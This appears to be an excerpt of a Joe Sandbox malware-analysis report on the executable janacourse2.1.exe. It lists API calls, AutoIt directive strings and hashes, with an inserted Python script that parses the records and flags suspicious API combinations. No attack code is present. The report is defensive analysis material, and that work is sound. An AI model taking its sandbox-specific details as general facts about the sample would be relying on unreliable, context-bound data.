                                                                                                            • Opcode Fuzzy Hash: 5cde73fc3d4a3de9f1c99f97438ae22a11d4d8e49ad0fd1f6a6dcb88e4b97657
                                                                                                            • Instruction Fuzzy Hash: C3416D76901218BFDB10DFA4CD81AEEBBB8EF19300F108095FA95B7184DB746E45CBA0
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\janacourse2.1.exe,00000104), ref: 00FE1769
                                                                                                            • _free.LIBCMT ref: 00FE1834
                                                                                                            • _free.LIBCMT ref: 00FE183E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$FileModuleName
                                                                                                            • String ID: C:\Users\user\Desktop\janacourse2.1.exe
                                                                                                            • API String ID: 2506810119-596226746
                                                                                                            • Opcode ID: 8151b9ae01661c8fdf1b11ee61e0ebcc1dfb628abcd007fbf6a5c519a4671bc0
                                                                                                            • Instruction ID: 4acbcabbab70fbd1ffa08fe17ec52006fa3107d644b95c9b8de53c1d90ed9702
                                                                                                            • Opcode Fuzzy Hash: 8151b9ae01661c8fdf1b11ee61e0ebcc1dfb628abcd007fbf6a5c519a4671bc0
                                                                                                            • Instruction Fuzzy Hash: 01318F71E04298AFDB21DF9B9C81D9EBBBCFF85720B144166F84497201D6748E41EB90
                                                                                                            APIs
                                                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0101C306
                                                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 0101C34C
                                                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01081990,01185A40), ref: 0101C395
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Delete$InfoItem
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 135850232-4108050209
                                                                                                            • Opcode ID: a61c69256397a6119006a8c39c751b137182ee7544639a4cac86ade8ee5a6bfb
                                                                                                            • Instruction ID: 052782f96603d52affeb3d27c2bf2775e737b76a5cb952b904eb725e1441cf49
                                                                                                            • Opcode Fuzzy Hash: a61c69256397a6119006a8c39c751b137182ee7544639a4cac86ade8ee5a6bfb
                                                                                                            • Instruction Fuzzy Hash: F141E3712443029FE724DF29D984B5ABBE8AF85310F04865EF9E5972C5D738E604CB52
                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0104CC08,00000000,?,?,?,?), ref: 010444AA
                                                                                                            • GetWindowLongW.USER32 ref: 010444C7
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 010444D7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Long
                                                                                                            • String ID: SysTreeView32
                                                                                                            • API String ID: 847901565-1698111956
                                                                                                            • Opcode ID: 5c34f54e81bfe6553d8fa222da00573a77f8d23fbae6a1f3f36145cb8d85b0b6
                                                                                                            • Instruction ID: 56cbe57524a927eadbe5668ee3af0e9efb6ac562c893c36c015e7aaac0e7624c
                                                                                                            • Opcode Fuzzy Hash: 5c34f54e81bfe6553d8fa222da00573a77f8d23fbae6a1f3f36145cb8d85b0b6
                                                                                                            • Instruction Fuzzy Hash: 3631C2B1210205AFEF618E38DC85BDA7BA9EB48334F208725F9B5D21D1DB74E8509B50
                                                                                                            APIs
                                                                                                              • Part of subcall function 0103335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,01033077,?,?), ref: 01033378
                                                                                                            • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0103307A
                                                                                                            • _wcslen.LIBCMT ref: 0103309B
                                                                                                            • htons.WSOCK32(00000000,?,?,00000000), ref: 01033106
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                            • String ID: 255.255.255.255
                                                                                                            • API String ID: 946324512-2422070025
                                                                                                            • Opcode ID: 051b0f2e343f47c66653f4f92fd7aaeaecff85380191772714189ea91d0bd695
                                                                                                            • Instruction ID: aa9b8729c29bf2652f247288ee4762b6a50ec7847b19a4799f8bca5e3ebaa419
                                                                                                            • Opcode Fuzzy Hash: 051b0f2e343f47c66653f4f92fd7aaeaecff85380191772714189ea91d0bd695
                                                                                                            • Instruction Fuzzy Hash: 9E31D2396042019FD720CF2DC5D5AAABBF8FF94318F148099E9968F392DB76E941C760
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 01044705
                                                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 01044713
                                                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0104471A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$DestroyWindow
                                                                                                            • String ID: msctls_updown32
                                                                                                            • API String ID: 4014797782-2298589950
                                                                                                            • Opcode ID: 49575626c6157dbb88810cf23a6a5187d3864a07e3350d81750c86381f3b048f
                                                                                                            • Instruction ID: 102564006b4a2f49e6dff30bd519149455adabcaa6d26d98493783e48cb7a8f0
                                                                                                            • Opcode Fuzzy Hash: 49575626c6157dbb88810cf23a6a5187d3864a07e3350d81750c86381f3b048f
                                                                                                            • Instruction Fuzzy Hash: 44211BB5600209AFEB11DF68DCC1DAA37ADEF4A294B040499FA94DB251CA75EC12DB60
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen
                                                                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                            • API String ID: 176396367-2734436370
                                                                                                            • Opcode ID: dd1a5d12214a83e6857511c0c9520939ca048929fa4ba693fc0df263c7cce52e
                                                                                                            • Instruction ID: ebc85b98bbcd5a199ba6b4f68e74056dd24b19ac0dd925254f6e0ea7e610d594
                                                                                                            • Opcode Fuzzy Hash: dd1a5d12214a83e6857511c0c9520939ca048929fa4ba693fc0df263c7cce52e
                                                                                                            • Instruction Fuzzy Hash: A521A07210421167E331BB2D9C22FBB73DD9F95308F05442AFAC597146EB5CA941D3E1
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01043840
                                                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01043850
                                                                                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01043876
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$MoveWindow
                                                                                                            • String ID: Listbox
                                                                                                            • API String ID: 3315199576-2633736733
                                                                                                            • Opcode ID: fb20632f5fa42170b394d6b256abe9b351402b388d0121521d616e81067797fb
                                                                                                            • Instruction ID: ff2c0eabce95729e276bf5c331bce290e3cdc4caba16ce3dd6f3598801215d32
                                                                                                            • Opcode Fuzzy Hash: fb20632f5fa42170b394d6b256abe9b351402b388d0121521d616e81067797fb
                                                                                                            • Instruction Fuzzy Hash: F421B3B2610228BBEB22CE59CC85EAB37AEFF89750F109164F9849B190C675DC518790
APIs
• SetErrorMode.KERNEL32(00000001), ref: 01024A08
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 01024A5C
• SetErrorMode.KERNEL32(00000000,?,?,0104CC08), ref: 01024AD0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: %lu
• API String ID: 2507767853-685833217
• Opcode ID: 1e08a4aad0f8cf7a55de883127223af5551bafb5bb990614ac1aba84c1a63943
• Instruction ID: 4df27189fd2411a8cd1c8dd4105e1188d988b3e4df022df275d6b1281e1a8c0d
• Opcode Fuzzy Hash: 1e08a4aad0f8cf7a55de883127223af5551bafb5bb990614ac1aba84c1a63943
• Instruction Fuzzy Hash: C2318F74A00109AFDB10DF54C9C5EAA7BF8EF08308F1480A9E949DB252D775ED45CB61
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0104424F
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 01044264
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01044271
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: e5627601f7bc306fba54d5efe0b4a5b86fc43d991a0e833aa702344abd3837f7
• Instruction ID: 958bcaf217f4680347e7dd014e3fadae4a3257a17df02c00f5f60790e44d5fae
• Opcode Fuzzy Hash: e5627601f7bc306fba54d5efe0b4a5b86fc43d991a0e833aa702344abd3837f7
• Instruction Fuzzy Hash: 9311C6B1240248BFEF215E69CC46FAB3BACEF85B64F014525FA95E6090D671D8119B20
APIs
  • Part of subcall function 00FB6B57: _wcslen.LIBCMT ref: 00FB6B6A
  • Part of subcall function 01012DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 01012DC5
  • Part of subcall function 01012DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 01012DD6
  • Part of subcall function 01012DA7: GetCurrentThreadId.KERNEL32 ref: 01012DDD
  • Part of subcall function 01012DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 01012DE4
• GetFocus.USER32 ref: 01012F78
  • Part of subcall function 01012DEE: GetParent.USER32(00000000), ref: 01012DF9
• GetClassNameW.USER32(?,?,00000100), ref: 01012FC3
• EnumChildWindows.USER32(?,0101303B), ref: 01012FEB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
• String ID: %s%d
• API String ID: 1272988791-1110647743
• Opcode ID: d34b03f4ddd38ce0f2934c7a6b34c4cff5cbbd23e8ad8b7ab4711530908e29dd
• Instruction ID: c09bf308316d8b5297480d0366c46a0ed10a8768a1400d9d3473b54b926863da
• Opcode Fuzzy Hash: d34b03f4ddd38ce0f2934c7a6b34c4cff5cbbd23e8ad8b7ab4711530908e29dd
• Instruction Fuzzy Hash: ED1102B1200206ABDF157F60CDD5EEE37AAAF94314F008079F9499B146DE3898498B30
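The function records above all share one text shape (bullet API lines with an optional "Part of subcall function" prefix, a module suffix, an argument list and a ref address, followed by the API ID / String ID fields), which makes them easy to triage by script instead of by eye. The Python below is an added example by the editor, not part of the Joe Sandbox report or its tooling: it parses records in that shape into structured calls, flags API combinations worth a closer look, and decodes the SendMessageW message numbers of the msctls_trackbar32 record a few entries up. The SAMPLE constant is constructed by copying three of the records on this page; the HEURISTICS table and the small TBM message table are the editor's own choices and assumptions (a subset for illustration, not a Joe Sandbox signature set).

```python
"""Parse Joe Sandbox function records (the 'APIs' / 'Similarity' blocks) and
triage their API combinations. Added example; sample text copied from the report."""
import re

# Constructed sample: three function records copied from the report above, kept
# in the report's own text shape (bullets, subcall prefixes, module suffix, ref).
SAMPLE = """
APIs
• SetErrorMode.KERNEL32(00000001), ref: 01024A08
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 01024A5C
• SetErrorMode.KERNEL32(00000000,?,?,0104CC08), ref: 01024AD0
• API ID: ErrorMode$InformationVolume
• String ID: %lu
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0104424F
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 01044264
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01044271
• API ID: MessageSend
• String ID: msctls_trackbar32
APIs
  • Part of subcall function 00FB6B57: _wcslen.LIBCMT ref: 00FB6B6A
  • Part of subcall function 01012DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 01012DC5
  • Part of subcall function 01012DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 01012DD6
  • Part of subcall function 01012DA7: GetCurrentThreadId.KERNEL32 ref: 01012DDD
  • Part of subcall function 01012DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 01012DE4
• GetFocus.USER32 ref: 01012F78
  • Part of subcall function 01012DEE: GetParent.USER32(00000000), ref: 01012DF9
• GetClassNameW.USER32(?,?,00000100), ref: 01012FC3
• EnumChildWindows.USER32(?,0101303B), ref: 01012FEB
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
• String ID: %s%d
"""

# One API call line: optional subcall prefix, Name.MODULE, optional (args), "ref: addr".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z][A-Z0-9_]*)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
FIELD_RE = re.compile(r"^\s*•\s*(API ID|String ID):\s*(.*)$")

# Editor's heuristics (an assumption of this example, not a Joe Sandbox signature set):
# every API in a set must appear in one function record for its label to fire.
HEURISTICS = {
    "reads focused control of another thread's window": {"AttachThreadInput", "GetFocus", "GetWindowThreadProcessId"},
    "enumerates child windows by class name": {"EnumChildWindows", "GetClassNameW"},
    "queries volume information (serial is a common host fingerprint input)": {"GetVolumeInformationW"},
}

# Subset of trackbar (msctls_trackbar32) messages; all are WM_USER (0x400) based.
TBM = {0x405: "TBM_SETPOS", 0x406: "TBM_SETRANGE", 0x414: "TBM_SETTICFREQ"}


def parse_records(text):
    """Split the text at each 'APIs' heading and collect that record's calls and IDs."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"calls": [], "api_id": "", "string_id": ""}
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            cur["calls"].append({
                "api": m["api"],
                "module": m["mod"],
                "args": [a for a in (m["args"] or "").split(",") if a],
                "ref": int(m["ref"], 16),
                # address of the helper the call was reached through, or None for a direct call
                "subcall": int(m["sub"], 16) if m["sub"] else None,
            })
            continue
        f = FIELD_RE.match(line)
        if f:
            cur["api_id" if f[1] == "API ID" else "string_id"] = f[2].strip()
    return records


def api_set(record, include_subcalls=True):
    """Names of APIs used by the record, optionally dropping calls made via subcalls."""
    return {c["api"] for c in record["calls"] if include_subcalls or c["subcall"] is None}


def flag(record):
    """Heuristic labels whose full API set is present in the record."""
    apis = api_set(record)
    return [label for label, needed in HEURISTICS.items() if needed <= apis]


def _hexarg(a):
    return None if a == "?" else int(a, 16)


def decode_sendmessage(record):
    """(message name, wParam, lParam) for each SendMessageW call; '?' args become None."""
    out = []
    for c in record["calls"]:
        if c["api"] != "SendMessageW" or len(c["args"]) < 4:
            continue
        msg = _hexarg(c["args"][1])
        name = TBM.get(msg, "?" if msg is None else f"0x{msg:X}")
        out.append((name, _hexarg(c["args"][2]), _hexarg(c["args"][3])))
    return out


if __name__ == "__main__":
    for r in parse_records(SAMPLE):
        print(r["api_id"] or "(no API ID)", "|", r["string_id"], "|", sorted(api_set(r)))
        for label in flag(r):
            print("   flag:", label)
        for msg in decode_sendmessage(r):
            print("   msg :", msg)
```

AttachThreadInput to the target window's thread followed by GetFocus is how one process reads which control currently has focus in a window owned by another thread; next to EnumChildWindows and GetClassNameW it has the shape of a control lookup helper, which is why the labels are phrased as observations rather than verdicts. In the trackbar record, 0x405, 0x406 and 0x414 decode to TBM_SETPOS, TBM_SETRANGE and TBM_SETTICFREQ, with lParam 0x00640000 giving a range of 0..100 and wParam 0x0A a tick frequency of 10, i.e. a slider control being initialised rather than anything payload-related.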
APIs
• GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 010458C1
• SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 010458EE
• DrawMenuBar.USER32(?), ref: 010458FD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Menu$InfoItem$Draw
• String ID: 0
• API String ID: 3227129158-4108050209
• Opcode ID: 3bdf69183403e4e1219cbd6338ae8c7d40363b7b774d0690d26bbddf445c3d1d
• Instruction ID: 5a6734fd2c850cd529b4be9f222ab3ad5e7d44e0371475032c14e4c6fb19c20f
• Opcode Fuzzy Hash: 3bdf69183403e4e1219cbd6338ae8c7d40363b7b774d0690d26bbddf445c3d1d
• Instruction Fuzzy Hash: AC01C4B5500208AFDB219F11DC85FAFBBB5FF45760F0080A9E889D6151DB348A84DF20
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4eac5262054d4140d629a114f2988ba1a1ee578ac0b12914bf1a71af4d136477
• Instruction ID: a8e81caea487fb675cff4eb2d1bdcaf0a8b7b7521d4ea73b4633401e8e067d7a
• Opcode Fuzzy Hash: 4eac5262054d4140d629a114f2988ba1a1ee578ac0b12914bf1a71af4d136477
• Instruction Fuzzy Hash: 7BC16E75A0020AEFDB15CF98C884AAEBBB9FF48704F108598F585EB259D735DD81CB90
APIs
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
• Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
• Instruction ID: 4620457575876801546dae63dc0ce482d5d241cd2b6a8a349c126c7b26911693
• Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
• Instruction Fuzzy Hash: 2CA14872D003C69FDB16CF19CC917AEBBE5EF65360F1841ADE6859B281C238A941E750
APIs
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Variant$ClearInitInitializeUninitialize
• String ID:
• API String ID: 1998397398-0
